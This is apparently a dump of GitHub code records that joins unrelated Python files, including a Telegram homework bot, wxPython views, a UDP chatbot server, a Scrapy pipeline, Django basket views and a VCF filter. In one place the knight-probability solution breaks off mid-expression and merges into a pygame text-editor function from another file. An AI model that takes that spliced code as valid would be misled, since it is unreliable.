1.\nprint(g.count(Truck))\n# How many buses in total? We expect 3.\nprint(g.count(Bus))\n# Get the fastest car and print its number. We expect zzz, because the truck is unexpectedly the fastest.\nprint(g.get_fastest_of_type(Car).number)\n# Get the fastest truck and print its number. We expect zzz.\nprint(g.get_fastest_of_type(Truck).number)\n# Get the fastest bus and print its number. 
We expect ASD.\nprint(g.get_fastest_of_type(Bus).number)","repo_name":"FlyingPotato-131/python-labs","sub_path":"3.1.py","file_name":"3.1.py","file_ext":"py","file_size_in_byte":3843,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"4671272995","text":"import sys\nimport time\nimport http\nimport logging\nfrom logging.handlers import RotatingFileHandler\n\nimport telegram\nimport requests\n\nfrom constants import (\n    ENDPOINT,\n    PRACTICUM_TOKEN,\n    TELEGRAM_TOKEN,\n    TELEGRAM_CHAT_ID,\n    RETRY_TIME,\n    HEADERS,\n    HOMEWORK_STATUSES)\nfrom exceptions import EmptyResponse, UnreachableTelegram\n\n\nlogger = logging\n\n\ndef send_message(bot, message):\n    \"\"\"Send a message to Telegram.\"\"\"\n    try:\n        bot.send_message(TELEGRAM_CHAT_ID, message)\n    except telegram.TelegramError:\n        logger.error('Failed to send the message')\n        raise UnreachableTelegram('Telegram is currently unavailable')\n    logger.info(f'Sending message: {message}')\n\n\ndef get_api_answer(current_timestamp):\n    \"\"\"Make a request to the API.\"\"\"\n    timestamp = current_timestamp or int(time.time())\n    params = {'from_date': timestamp}\n    result = dict()\n    response = requests.get(ENDPOINT, headers=HEADERS, params=params)\n    if response.status_code == http.HTTPStatus.OK:\n        try:\n            result = response.json()\n            return result\n        except Exception as error:\n            logger.error(error, exc_info=True)\n    elif response.status_code in (\n            http.HTTPStatus.INTERNAL_SERVER_ERROR,\n            http.HTTPStatus.NETWORK_AUTHENTICATION_REQUIRED):\n        logger.error('Status code in the 500 range')\n        raise requests.exceptions.ConnectionError\n    elif response.status_code == http.HTTPStatus.REQUEST_TIMEOUT:\n        logger.error('Status code 408')\n        raise requests.exceptions.ReadTimeout\n    logger.error(f'Program failure: endpoint '\n                 f'{ENDPOINT} is unavailable. '\n                 f'API response code: {response.status_code}')\n\n\ndef check_response(response):\n    \"\"\"Check that the response matches the expected Python data types.\"\"\"\n    if not isinstance(response, dict):\n        logger.error('Response type is not a dict')\n        raise TypeError('Response type is not a dict')\n    elif 'homeworks' not in response or 'current_date' not in response:\n        logger.error('Keys \"homeworks\" or \"current_date\" are missing')\n        raise EmptyResponse(response)\n    elif not isinstance(response.get('homeworks'), list):\n        logger.error('\"homeworks\" is not a list')\n        raise TypeError('\"homeworks\" is not a list')\n    return response['homeworks']\n\n\ndef parse_status(homework):\n    \"\"\"Build a verdict about the homework status from the data.\"\"\"\n    homework_name = homework.get('homework_name')\n    homework_status = homework.get('status')\n    if HOMEWORK_STATUSES.get(homework_status) is not None:\n        verdict = HOMEWORK_STATUSES.get(homework_status)\n        return f'The review status of homework \"{homework_name}\" has changed. 
{verdict}'\n    raise KeyError('Unknown status')\n\n\ndef check_tokens():\n    \"\"\"Check that all tokens are present.\"\"\"\n    return all([\n        PRACTICUM_TOKEN,\n        TELEGRAM_TOKEN,\n        TELEGRAM_CHAT_ID\n    ])\n\n\ndef main():\n    \"\"\"Main bot logic.\"\"\"\n    HOME_STATUS = None\n    LAST_ERROR = None\n    bot = telegram.Bot(token=TELEGRAM_TOKEN)\n    current_timestamp = int(time.time())\n    send_message(bot, 'Bot activated.')\n    print('Activation')\n    while True:\n        try:\n            check = check_tokens()\n            if check:\n                api = get_api_answer(current_timestamp)\n                current_timestamp = api['current_date']\n                homeworks = check_response(api)\n                if len(homeworks) > 0:\n                    status = homeworks[0]['status']\n                    if HOME_STATUS != status:\n                        message = parse_status(homeworks[0])\n                        send_message(bot, message)\n                        HOME_STATUS = status\n                    else:\n                        logger.info('No change in homework status')\n                else:\n                    logger.debug('Response is empty')\n            else:\n                logger.critical('Environment variables are missing')\n                sys.exit('Environment variables are missing')\n\n        except Exception as error:\n            message = f'Program failure: {error}'\n            logger.error(message)\n            if LAST_ERROR != error:\n                send_message(bot, message)\n                LAST_ERROR = error\n        finally:\n            time.sleep(RETRY_TIME)\n\n\nif __name__ == '__main__':\n    logging.basicConfig(\n        level=logging.DEBUG,\n        stream=sys.stdout,\n        format='%(asctime)s, %(levelname)s, %(message)s, %(name)s')\n\n    handler = RotatingFileHandler(\n        'my_logger.log',\n        maxBytes=50000000,\n        encoding='UTF-8',\n        backupCount=5)\n    logger = logging.getLogger(__name__)\n    logger.setLevel(logging.DEBUG)\n    logger.addHandler(handler)\n    formatter = logging.Formatter(\n        '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n    )\n    handler.setFormatter(formatter)\n    main()\n","repo_name":"PVasily/homework_bot","sub_path":"homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18903446839","text":"import pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score\nplt.style.use('ggplot')\n\n#Returns ensembled prediction accuracy as a function of the number of models\n#(final_preds is assumed to be defined elsewhere in the project: it combines\n# the weighted predictions of the first i models into one ensembled prediction)\ndef ensemble(predictions,weights,target):\n    acc_list = []\n    for i in range(len(predictions)):\n        ens_preds = final_preds(predictions[:(i+1)],weights[:(i+1)])\n        acc_list.append(accuracy_score(target,ens_preds))\n    return acc_list\n\npreds_inpath = '../Data/predictions.txt'\nwts1_inpath = '../Data/weights1.txt'\nwts2_inpath = '../Data/weights2.txt'\nwts3_inpath = '../Data/weights3.txt'\nwts4_inpath = '../Data/weights4.txt'\ntest_target_inpath = '../Data/test_target.csv'\nfigure_path = '../Figures/ensemble_accs.jpg'\n\nwith open(preds_inpath,'rb') as fp:\n    predictions = pickle.load(fp)\nwith open(wts1_inpath,'rb') as fp:\n    weights1 = pickle.load(fp)\nwith open(wts2_inpath,'rb') as fp:\n    weights2 = pickle.load(fp)\nwith open(wts3_inpath,'rb') as fp:\n    weights3 = pickle.load(fp)\nwith open(wts4_inpath,'rb') as fp:\n    weights4 = pickle.load(fp)\n\ntest_target = pd.read_csv(test_target_inpath)\n\nacc_list1 = ensemble(predictions,weights1,test_target)\nacc_list2 = ensemble(predictions,weights2,test_target)\nacc_list3 = ensemble(predictions,weights3,test_target)\nacc_list4 = ensemble(predictions,weights4,test_target)\n\nplt.figure(figsize = (16,8))\n\nplt.plot(acc_list1,color='red',label='Equal')\nplt.plot(acc_list2,'b--',label='Accuracy')\nplt.plot(acc_list3,color='green',label='ReLu_Lin')\nplt.plot(acc_list4,color='yellow',label='ReLu_Exp')\n\nplt.title('Accuracy vs. 
# of Models')\nplt.xlabel('# of Models')\nplt.ylabel('Accuracy')\nplt.ylim(bottom=0.4)\nplt.legend()\nplt.savefig(figure_path)\n","repo_name":"pjourgensen/Gene-Selection","sub_path":"Scripts/acc_plot.py","file_name":"acc_plot.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"72363141663","text":"# -*- coding: utf-8 -*-\n\"\"\"\n`*View` classes are used to take a closer look at certain objects.\n\"\"\"\n\nimport wx\nimport re\nimport card\nfrom deck import Deck\nimport utilities\n\n\n######################\n# DeckView Class\n######################\n\nclass DeckView(utilities.AutoSize):\n    \"\"\"Displays a \"minimap\" of the current `Deck`. Uses `MiniCard` to represent a `Card` on the `Deck`.\"\"\"\n\n    DEFAULT_FACTOR = 5\n    BACKGROUND_CL = (255, 255, 255, 255)\n    DEFAULT_MINI_CL = (220, 218, 213, 255)\n    \n    def __init__(self, parent, deck=None, pos=wx.DefaultPosition, size=wx.DefaultSize):\n        \"\"\"Constructor.\n\n        * `parent: ` the parent `Box`.\n        * `deck: ` the `Deck` we are viewing.\n        * `pos: ` by default, is `wx.DefaultPosition`.\n        * `size: ` by default, is `wx.DefaultSize`.\n        \"\"\"\n        super(DeckView, self).__init__(parent, pos=pos, size=size)\n\n        # members \n        self.factor = DeckView.DEFAULT_FACTOR\n        self.cards = {}\n        self.SetBackgroundColour(self.BACKGROUND_CL)\n        self.SetDeck(deck)\n\n        # bindings\n        self.Bind(wx.EVT_SHOW, self.OnShow)\n\n\n    ## Behavior functions\n\n    def Clear(self):\n        \"\"\"Delete all `MiniCard`s from this view.\"\"\"\n        self.cards = {}\n\n    def SetDeck(self, deck):\n        \"\"\"Sets the `Deck` we are going to view.\n        \n        * `deck: ` a `Deck`.\n        \"\"\"\n        self.Clear()\n        for c in deck.GetCards():\n            self.AddCard(c)\n\n        # set size, fixed for scale/zoom\n        sz = [i / self.factor for i in deck.GetSize()]\n        self.SetSize(sz)\n        self.UpdateContentSize(deck.content_sz)\n\n        step = deck.GetScrollPixelsPerUnit()\n        self.SetScrollRate(step[0] / self.factor, step[1] / self.factor)\n\n        deck.Bind(Deck.EVT_NEW_CARD, self.OnNewCard)\n        deck.Bind(wx.EVT_SIZE, self.OnDeckSize)\n        deck.Bind(wx.EVT_SCROLLWIN, self.OnDeckScroll)\n    \n        self.deck = deck\n    \n    def AddCard(self, crd):\n        \"\"\"Adds a new `MiniCard`.\"\"\"\n        # note: the parameter is named `crd` so it does not shadow the `card` module\n        r = wx.Rect(*[i / self.factor for i in crd.GetRect()])\n        mini = MiniCard(self, pos=(r.left, r.top), size=(r.width, r.height))\n\n        if isinstance(crd, card.Content):\n            mini.SetBackgroundColour(crd.GetBackgroundColour())\n        else:\n            mini.SetBackgroundColour(self.DEFAULT_MINI_CL)\n\n        crd.Bind(card.Card.EVT_DELETE, self.OnDeleteCard)\n        if isinstance(crd, card.Content):\n            crd.Bind(card.Content.EVT_CONT_KIND, self.OnContentKind)\n\n        # retain a reference to the original, for deleting\n        self.cards[crd] = mini\n\n    def RemoveCard(self, card):\n        \"\"\"Remove a `MiniCard`.\"\"\"\n        if card in self.cards.keys():\n            mini = self.cards[card]\n            mini.Hide()\n            mini.Destroy()\n            del self.cards[card]\n\n    def SetPosition(self):\n        \"\"\"Calculates position relative to the `Deck`.\"\"\"\n        w, h = self.GetSize()\n        rect = self.deck.GetClientRect()\n        pos = (rect.right - w, rect.bottom - h)\n        self.Move(pos)\n\n\n    ### Callbacks\n\n    def OnShow(self, ev):\n        \"\"\"Listens to `wx.EVT_SHOW`.\"\"\"\n        self.SetPosition()\n\n    def OnDeckScroll(self, ev):\n        \"\"\"Listens to `wx.EVT_SCROLLWIN` from the underlying `Deck`.\"\"\"\n        view = ev.GetEventObject().GetViewStart()\n        self.Scroll(view.x / self.factor, view.y / self.factor)\n\n    def OnDeckSize(self, ev):\n        \"\"\"Listens to `wx.EVT_SIZE` from the underlying `Deck`.\"\"\"\n        self.SetSize([i / self.factor + 30 for 
i in self.deck.GetSize()])\n        self.SetPosition()\n\n    def OnNewCard(self, ev):\n        \"\"\"Listens to `Deck.EVT_NEW_CARD`.\"\"\"\n        self.AddCard(ev.GetEventObject())\n\n    def OnDeleteCard(self, ev):\n        \"\"\"Listens to `Card.EVT_DELETE` from each `Card` on the `Deck`.\"\"\"\n        self.RemoveCard(ev.GetEventObject())\n        # don't consume it! Deck also needs it\n        ev.Skip()\n\n    def OnContentKind(self, ev):\n        \"\"\"Listens to `Content.EVT_CONT_KIND` events from each `Content`.\"\"\"\n        card = ev.GetEventObject()\n        self.cards[card].SetBackgroundColour(card.GetBackgroundColour())\n    \n\n\n######################\n# CardView Class\n###################### \n\nclass CardView(wx.Panel):\n    \"\"\"Displays a screen-sized `Content` `Card` to facilitate editing. While\n    viewing, the `Card`s are `Reparent`ed to this window.\n    \"\"\"\n    \n    CARD_PADDING = Deck.CARD_PADDING\n    BACKGROUND_CL = \"#CCCCCC\"\n    \n    TITLE_FONT = (18, wx.SWISS, wx.ITALIC, wx.BOLD)\n    CONTENT_FONT = (14, wx.FONTFAMILY_DEFAULT, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)\n\n    def __init__(self, parent, cards=[], pos=wx.DefaultPosition, size=wx.DefaultSize):\n        \"\"\"Constructor.\n\n        * `parent: ` the parent `Box`.\n        * `cards: ` the `Card`s we are viewing.\n        * `pos: ` by default, is `wx.DefaultPosition`.\n        * `size: ` by default, is `wx.DefaultSize`.\n        \"\"\"\n        super(CardView, self).__init__(parent, size=size)\n        \n        # GUI\n        self.SetBackgroundColour(self.BACKGROUND_CL)\n        hbox = wx.BoxSizer(wx.HORIZONTAL)\n        self.SetSizer(hbox)\n\n        # members\n        self.cards = {}\n\n    \n    ### Behavior functions\n\n    def GetCards(self):\n        \"\"\"Returns the `Card`s currently under viewing.\n\n        `returns: ` a `list` of `Card`s.\n        \"\"\"\n        return self.cards.keys()\n\n    def AddCard(self, crd):\n        \"\"\"Adds one `Card` to the viewing control.\n\n        * `crd: ` a `Card`.\n        \"\"\"\n        # setup and reparent: will restore parent when done. 
See RestoreCards.\n        self.cards[crd] = {}\n        self.cards[crd][\"parent\"] = crd.GetParent()\n        self.cards[crd][\"rect\"] = crd.GetRect()\n        crd.Reparent(self)\n        crd.SetViewing(True)\n        crd.content.SetFocus()\n        \n        # setup UI\n        box = self.GetSizer()\n        box.Add(crd, proportion=1, flag=wx.ALL|wx.EXPAND, border=self.CARD_PADDING)\n        box.Layout()\n\n        # bindings\n        crd.Bind(card.Card.EVT_CANCEL_VIEW, self.OnCancelView)\n\n    def SetCards(self, cards):\n        \"\"\"Clears previous `Card`s and views the new ones.\n\n        * `cards: ` a `list` of `Card`s.\n        \"\"\"\n        self.Clear()\n        for c in cards: self.AddCard(c)\n\n    def Restore(self):\n        \"\"\"Restores the viewed `Card`s to their original parents and positions.\"\"\"\n        for c in self.cards:\n            c.Reparent(self.cards[c][\"parent\"])\n            c.SetRect(self.cards[c][\"rect\"])\n        self.Clear()\n\n    def Clear(self):\n        \"\"\"Clear all viewed `Card`s.\"\"\"\n        self.GetSizer().Clear()\n        for c in self.cards.keys():\n            c.SetViewing(False)\n        self.cards = {}\n\n\n    ### Callbacks\n\n    def OnCancelView(self, ev):\n        \"\"\"Listens to `Card.EVT_CANCEL_VIEW` on every viewed `Card`.\"\"\"\n        self.Restore()\n        event = card.Card.CancelViewEvent(id=wx.ID_ANY)\n        event.SetEventObject(ev.GetEventObject())\n        self.GetEventHandler().ProcessEvent(event)\n    \n\n\n######################\n# MiniCard Class\n###################### \n\nclass MiniCard(wx.Window):\n    \"\"\"The little cards shown in a `DeckView`.\"\"\"\n    \n    def __init__(self, parent, pos=wx.DefaultPosition, size=wx.DefaultSize):\n        \"\"\"Constructor.\n\n        * `parent: ` the parent `DeckView`.\n        * `pos: ` by default, is `wx.DefaultPosition`.\n        * `size: ` by default, is `wx.DefaultSize`.\n        \"\"\"\n        super(MiniCard, self).__init__(parent, pos=pos, size=size)\n        \n        self.SetBackgroundColour(\"#FFFFFF\")\n\n\n\n######################\n# TagView Class\n###################### \n\nclass TagView(wx.Panel):\n    \"\"\"The sidebar that displays a `Content` `Card`'s tags.\"\"\"\n\n    TAGS_REGEX = \"^(\\w+):(.*)$\"\n    \n    def __init__(self, parent, deck, pos=wx.DefaultPosition, size=wx.DefaultSize):\n        \"\"\"Constructor.\n\n        * `parent: ` the parent `Box`.\n        * `deck: ` the parent `Deck` of the `Card`s we are viewing.\n        * `pos: ` by default, is `wx.DefaultPosition`.\n        * `size: ` by default, is `wx.DefaultSize`.\n        \"\"\"\n        super(TagView, self).__init__(parent, pos=pos, size=size)\n        self.deck = deck\n        self.InitUI()\n\n        # bindings\n        self.Bind(wx.EVT_SHOW, self.OnShow)\n        deck.Bind(Deck.EVT_NEW_CARD, self.OnNewCard)\n\n\n    ### Behavior functions\n\n    def ParseTags(self, txt):\n        \"\"\"Parses a string looking for tags.\n\n        * `txt: ` a string, the contents of a `Content`.\n\n        `returns: ` a string to display in the `TagView` view, representing the tags found in `text`.\n        \"\"\"\n        string = \"\"\n        results = re.findall(self.TAGS_REGEX, txt, re.MULTILINE)\n        for tag, val in results:\n            string += tag + \":\" + val\n            string += \"\\n\\n\"\n        return string\n\n    def ShowTags(self, card):\n        \"\"\"Shows the `card`'s tags.\n\n        * `card: ` a `Content`, whose contents will be parsed.\n        \"\"\"\n        self.txt.SetValue(self.ParseTags(card.GetContent()))\n    \n    \n    ### Auxiliary functions\n\n    def InitUI(self):\n        \"\"\"Initialize this window's GUI and controls.\"\"\"\n        box = wx.BoxSizer(wx.VERTICAL)\n        self.SetSizer(box)\n\n        txt = wx.TextCtrl(self, style=wx.TE_MULTILINE)\n        self.txt = txt \n        box.Add(txt, proportion=1, flag=wx.ALL|wx.EXPAND, border=1)\n\n\n    ### Callbacks\n\n    def OnShow(self, ev):\n        \"\"\"Listens to `wx.EVT_SHOW`.\"\"\"\n        if ev.IsShown():\n            crd = utilities.GetCardAncestor(self.FindFocus())\n            if crd and isinstance(crd, 
card.Content):\n                self.ShowTags(crd)\n\n    def OnNewCard(self, ev):\n        \"\"\"Listens to `Deck.EVT_NEW_CARD`.\"\"\"\n        card = ev.GetEventObject()\n        for ch in card.GetChildren():\n            ch.Bind(wx.EVT_SET_FOCUS, self.OnCardChildFocus)\n\n    def OnCardChildFocus(self, ev):\n        \"\"\"Listens to `wx.EVT_SET_FOCUS` on every `Card`.\"\"\"\n        card = utilities.GetCardAncestor(ev.GetEventObject())\n        if self.IsShown():\n            self.ShowTags(card)\n        ev.Skip()\n\n\n\n###########################\n# pdoc documentation setup\n###########################\n# __pdoc__ is the special variable from the automatic\n# documentation generator pdoc.\n# By setting pdoc[class.method] to None, we are telling\n# pdoc to not generate documentation for said method.\n__pdoc__ = {}\n__pdoc__[\"field\"] = None\n\n# Since we only want to generate documentation for our own\n# methods, and not the ones coming from the base classes,\n# we first set to None every method in the base class.\nfor field in dir(utilities.AutoSize):\n    __pdoc__['DeckView.%s' % field] = None\nfor field in dir(wx.Panel):\n    __pdoc__['CardView.%s' % field] = None\nfor field in dir(wx.Window):\n    __pdoc__['MiniCard.%s' % field] = None\nfor field in dir(wx.Panel):\n    __pdoc__['TagView.%s' % field] = None\n\n# Then, we have to add again the methods that we have\n# overridden. See https://github.com/BurntSushi/pdoc/issues/15.\nfor field in DeckView.__dict__.keys():\n    if 'DeckView.%s' % field in __pdoc__.keys():\n        del __pdoc__['DeckView.%s' % field]\nfor field in CardView.__dict__.keys():\n    if 'CardView.%s' % field in __pdoc__.keys():\n        del __pdoc__['CardView.%s' % field]\nfor field in MiniCard.__dict__.keys():\n    if 'MiniCard.%s' % field in __pdoc__.keys():\n        del __pdoc__['MiniCard.%s' % field]\nfor field in TagView.__dict__.keys():\n    if 'TagView.%s' % field in __pdoc__.keys():\n        del __pdoc__['TagView.%s' % field]\n","repo_name":"leotrs/threepy5","sub_path":"threepy5/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":11451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22537209133","text":"from unittest import TestCase, main\nfrom unittest.mock import patch\nfrom test_helper import run_test\n\nclass TestBlackjack(TestCase):\n\n    @patch('blackjack_helper.randint')\n    @patch('builtins.input')\n    def test_example(self, input_mock, randint_mock):\n        '''\n        Both the dealer and user receive cards that end up with a hand less than 21.\n        The dealer wins by having a higher hand than the user.\n\n        This does not count as one of your tests.\n        '''\n        output = run_test([3, 5, 8], ['y', 'n'], [3, 5, 10], randint_mock, input_mock)\n        expected = \"-----------\\n\" \\\n                   \"YOUR TURN\\n\" \\\n                   \"-----------\\n\" \\\n                   \"Drew a 3\\n\" \\\n                   \"Drew a 5\\n\" \\\n                   \"You have 8. Hit (y/n)? y\\n\" \\\n                   \"Drew an 8\\n\" \\\n                   \"You have 16. Hit (y/n)? n\\n\" \\\n                   \"Final hand: 16.\\n\" \\\n                   \"-----------\\n\" \\\n                   \"DEALER TURN\\n\" \\\n                   \"-----------\\n\" \\\n                   \"Drew a 3\\n\" \\\n                   \"Drew a 5\\n\" \\\n                   \"Dealer has 8.\\n\" \\\n                   \"Drew a 10\\n\" \\\n                   \"Final hand: 18.\\n\" \\\n                   \"-----------\\n\" \\\n                   \"GAME RESULT\\n\" \\\n                   \"-----------\\n\" \\\n                   \"Dealer wins!\\n\"\n        self.assertEqual(output, expected)\n\n    # Make sure all your test functions start with test_ \n    # Follow indentation of test_example\n    # WRITE ALL YOUR TESTS BELOW. Do not delete this line.\n\n    # Write all your tests above this. 
Do not delete this line.\n\nif __name__ == '__main__':\n main()\n","repo_name":"Henrywis/BlackJack","sub_path":"test_blackjack.py","file_name":"test_blackjack.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"15790398754","text":"# Palatip Wongyeekul (5910406329)\n# Phatchanya Chongsheveewat (5910406337)\n\nfrom socket import *\nfrom tinydb import TinyDB, where\nimport random\ndb = TinyDB('db.json')\nkey = [\"\",\"\"]\ndef addword(clientAddress):\n\t\n\tserverSocket.sendto(\"Question : \".encode(),clientAddress)\n\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\tmodifiedMessage = message.decode()\n\tkey[0] = modifiedMessage\n\t\n\t\n\tserverSocket.sendto(\"Answer : \".encode(),clientAddress)\n\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\tmodifiedMessage = message.decode()\n\tkey[1] = modifiedMessage\n\tdb.insert({key[0]:key[1]})\n\t\n\tserverSocket.sendto(\"200\".encode(),clientAddress)\n\nserverPort = 12002\nserverSocket = socket(AF_INET, SOCK_DGRAM)\nserverSocket.bind(('', serverPort))\nprint ('The server is ready to receive') \nwhile 1:\n\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\tmodifiedMessage = message.decode()\n\tprint(modifiedMessage)\n\ta = db.search(where(modifiedMessage))\n\tif a == []:\n\t\tserverSocket.sendto(\"Add word (y/n) ?\".encode(),clientAddress)\n\t\tmessage, clientAddress = serverSocket.recvfrom(2048)\n\t\tmodifiedMessage = message.decode()\n\t\tif(modifiedMessage=='Y' or modifiedMessage=='y'):\n\t\t\taddword(clientAddress)\n\t\telse:\n\t\t\tserverSocket.sendto(\"404\".encode(),clientAddress)\n\t\t\tcontinue\n\telse:\n\t\ta = random.choice([a for a in db.search(where(modifiedMessage))]) \n\t\tserverSocket.sendto(a[modifiedMessage].encode(),clientAddress)\n ","repo_name":"iphatchanya/miniChatbot","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18934645610","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport sqlite3\n\nclass AmzbooksPipeline:\n def __init__(self):\n self.create_conn()\n self.create_table()\n def create_conn(self):\n self.conn = sqlite3.connect(\"documents.db\")\n\n #we call cursor\n self.curr= self.conn.cursor()\n\n def create_table(self):\n #from cursor we call method execute to do these queries\n self.curr.execute(\"\"\"DROP TABLE IF EXISTS docs_tb\"\"\")\n self.curr.execute(\"\"\"create table docs_tb(Title text,Authors text,Cited_by text,description text)\"\"\")\n\n def process_item(self, item, spider):\n #store only items from spider named info\n #else return item\n if spider.name not in ['info']:\n return item\n else:\n self.store_db(item)\n return item\n\n def store_db(self,item):\n #insert title,author,citation,page source into db\n self.curr.execute(\"\"\"insert into docs_tb values (?,?,?,?)\"\"\",(\n item['title'][0],\n\n #get all authors on the same line\n [item['author']][0],\n item['cited_by'][0],\n item['file'][0]\n ))\n 
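# commit after each item so the inserted row is persisted even if the spider stops early\n            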
self.conn.commit()\n\n","repo_name":"XaraKat/Scrapy-Books","sub_path":"books/amzbooks/amzbooks/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7720767200","text":"class Solution:\n def knightProbability(self, n: int, k: int, row: int, column: int) -> float:\n \n next_diffs = [\n (-1,-2),\n (-2,-1),\n (-2,1),\n (-1,2),\n (1,2),\n (2,1),\n (2,-1),\n (1,-2)\n ]\n \n is_in_bounds = lambda coord: all(map(lambda pos : 0<=pos None:\n \"\"\"\n Chosen LineIndex set to start of highlighted area\n \"\"\"\n if line_start <= line_end:\n # downward highlight or the same line\n self.chosen_line_index = line_start\n self.chosen_letter_index = letter_start\n else: # upward highlight\n self.chosen_line_index = line_end\n self.chosen_letter_index = letter_end\n\n\ndef jump_to_end(self, line_start, line_end, letter_start, letter_end) -> None:\n \"\"\"\n Chosen LineIndex set to end of highlighted area\n \"\"\"\n if line_start <= line_end:\n # downward highlight or the same line\n self.chosen_line_index = line_end\n self.chosen_letter_index = letter_end\n else: # upward highlight\n self.chosen_line_index = line_start\n self.chosen_letter_index = letter_start\n\n\ndef reset_after_highlight(self) -> None:\n \"\"\"\n Reset caret, clickdown_cycles and dragged booleans.\n \"\"\"\n self.dragged_active = False # deactivate highlight\n self.dragged_finished = True # highlight is finished\n self.update_caret_position() # update caret position to chosen_Index (Line+Letter)\n self.last_clickdown_cycle = 0 # reset drag-cycle\n self.last_clickup_cycle = -1\n self.render_line_numbers_flag = True\n\n if len(self.editor_lines) <= self.showable_line_numbers_in_editor:\n self.first_showable_line_index = 0 # update first showable line\n","repo_name":"CribberSix/pygame-texteditor","sub_path":"src/pygame_texteditor/_other.py","file_name":"_other.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"7"} +{"seq_id":"13591503893","text":"import json\n\ndata = {}\nQState = {'status':{'R':0,'Q':0,'H':0},'qstate':{}}\nwith open('jsonoutput.json','r') as fp:\n data = json.load(fp)\n \nfor k in data.keys():\n if(data[k]['State']=='R'):\n QState['status']['R'] += 1\n elif(data[k]['State']=='Q'):\n QState['status']['Q'] += 1\n if(data[k]['Queue'] not in QState['qstate'].keys()):\n QState['qstate'][data[k]['Queue']] = 1\n else:\n QState['qstate'][data[k]['Queue']] += 1\n elif(data[k]['State']=='H'):\n QState['status']['H'] += 1\n \nwith open('QState.json','w') as fp:\n json.dump(QState,fp)","repo_name":"iamashish7/MAP","sub_path":"code/realtime/2010/calcQState.py","file_name":"calcQState.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"35941759040","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template import loader\nfrom django.urls import reverse\n\nfrom basketapp.models import BasketItem\nfrom mainapp.models import Product\n\n\n@login_required\ndef index(request):\n basket_items = request.user.user_basket.all()\n context = {\n 'page_title': 'корзина',\n 'basket_items': basket_items,\n }\n return render(request, 'basketapp/index.html', 
context)\n\n\n@login_required\ndef add(request, pk):\n if 'login' in request.META.get('HTTP_REFERER'):\n return HttpResponseRedirect(\n reverse(\n 'main:product_page',\n kwargs={'pk': pk}\n )\n )\n\n product = get_object_or_404(Product, pk=pk)\n basket = BasketItem.objects.filter(user=request.user, product=product).first()\n\n if not basket:\n basket = BasketItem(user=request.user, product=product)\n\n basket.quantity += 1\n basket.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n\n@login_required\ndef delete(request, pk):\n get_object_or_404(BasketItem, pk=pk).delete()\n return HttpResponseRedirect(reverse('basket:index'))\n\n\ndef change(request, pk, quantity):\n if request.is_ajax():\n basket_item = BasketItem.objects.filter(pk=pk).first()\n if quantity == 0:\n basket_item.delete()\n else:\n # quantity validation\n basket_item.quantity = quantity\n basket_item.save()\n\n context = {\n 'basket_items': request.user.user_basket.all(),\n }\n\n basket_items = loader.render_to_string(\n 'basketapp/inc/inc__basket_items.html',\n context=context,\n request=request, # csrf token update\n )\n\n return JsonResponse({\n 'basket_items': basket_items,\n })\n","repo_name":"AlexeyDubrov/Django_geekshop","sub_path":"geekshop/basketapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"25066158978","text":"import argparse\nimport requests\nimport gzip\nimport os\nimport re\nfrom api_request import get_variant_gene\nfrom io import BytesIO\n\n\ndef verify_DP(input_string, minDP):\n if minDP is None:\n return True\n else:\n pattern = \"DP=([^;]+)\"\n match = re.search(pattern, input_string)\n if match and int(match.group(1)) > minDP:\n return True\n else:\n return None\n\n\ndef is_between(value, lower_bound, upper_bound):\n if lower_bound is None and upper_bound is None:\n return True # Both bounds are None, so there's no valid range.\n elif lower_bound is None:\n return value <= upper_bound\n elif upper_bound is None:\n return value >= lower_bound\n else:\n return lower_bound <= value <= upper_bound\n\n\ndef create_file(name, header, line):\n # Directory where you want to create the files\n output_directory = \"filtered_samples\"\n\n os.makedirs(output_directory, exist_ok=True)\n\n header = \"\\n\".join(header)\n formatted_name = name.replace(\"./.:.:.:.:.:.:.\", \"\")\n formatted_name = re.sub(r'[:/\\\\]', ' ', formatted_name)\n\n file_path = os.path.join(output_directory, f\"{formatted_name}_filtered.vcf\")\n\n if os.path.exists(file_path):\n with open(file_path, \"a\") as file:\n file.write(line + \"\\n\")\n else:\n with open(file_path, \"w\") as file:\n file.write(header + \"\\n\")\n file.write(line + \"\\n\")\n pass\n\n\ndef parse_vcf_arguments():\n parser = argparse.ArgumentParser(description=\"Process a VCF file and split it into different output files.\")\n\n # 